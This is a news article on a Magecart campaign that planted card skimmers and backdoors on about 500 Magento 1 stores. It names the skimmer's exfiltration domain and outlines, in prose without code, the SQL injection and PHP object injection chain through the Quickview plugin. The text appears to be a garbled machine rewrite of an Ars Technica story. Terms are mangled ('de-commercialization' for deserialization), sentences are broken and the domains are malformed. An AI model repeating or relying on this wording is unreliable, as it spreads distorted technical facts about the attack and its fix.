About 500 e-commerce Websites were recently found to be compromised by hackers who installed stealthy credit card readers that steal sensitive data when visitors attempt to make purchases.
ONE report published on Tuesday is just the latest in regard to Magecart, a contamination term given to competing criminal groups that infect ecommerce sites with skimmers. Over the past few years, Thousands belong to web sites was to hit by tapping make them run malicious code. When a visitor enters payment card details during a purchase, the code sends that information to servers controlled by the attacker.
Sansec, the security company that discovered the latest wave of infections, said the compromised websites were loading malicious scripts hosted at the naturalfreshmall domain.[.]com.
“Natural Fresh skimmer displays a fake payment popup, defeating the security of a hosted (PCI-compliant) form of payment,” the company researchers said. Written on Twitter. “Payment sent to https://naturalfreshmall[.]com/Payment/Payment.php. ”
The hacker then modify existing files or create new ones that provide no less than 19 backdoors that hackers can use to keep control of websites in case a malicious script is detected and removed and the vulnerable software is updated. The only way to completely disinfect a site is to identify and remove the backdoors before updating the vulnerable CMS that allowed the site to be hacked in the first place.
Sansec worked with the administrators of the hacked sites to determine the common entry points used by the attackers. The researchers eventually determined that the attackers combined the SQL injection exploit with a PHP object injection attack in a Magento plug-in called Quickview. The exploit allows attackers to execute malicious code directly on the web server.
They completed this code execution by abusing Quickview to add validation rules to the customer_eav_attribute table and inserting a payload that tricked the hosting application into creating a malicious object. They then register as a new user on the site.
“However, simply adding it to the database will not run the code,” said Sansec researchers explain. “Magento really needs to decrypt the data. And there is a clever twist to this attack: By using authentication rules for new customers, an attacker can trigger a de-commercialization process simply by browsing through the Magento registration page.” .
It’s not hard to find sites that are still infected more than a week after Sansec first reported the campaign on Twitter. At the time this post went live, Bedexpress[.]com continues to contain this HTML attribute, which pulls JavaScript from the fake naturalfreshmall[.]domain com.
The hacked sites were running Magento 1, a version of the e-commerce platform that was discontinued in June 2020. A safer bet for any site still using this deprecated plan. is to upgrade to the latest version of Adobe Commerce. Another option is to install the available open source patches for Magento 1 using DIY software from the OpenMage project or with commercial support from Mage-One.
In general, it is difficult for people to spot a payment card skimmer without special training. One option is to use anti-virus software like Malwarebytes, which checks in real time for JavaScript being served on a visited website. People may also want to stay away from websites that appear to be using outdated software, although that can hardly guarantee that the site is secure.
This story originally appeared on Ars Technica.
Stories with WIRED are better
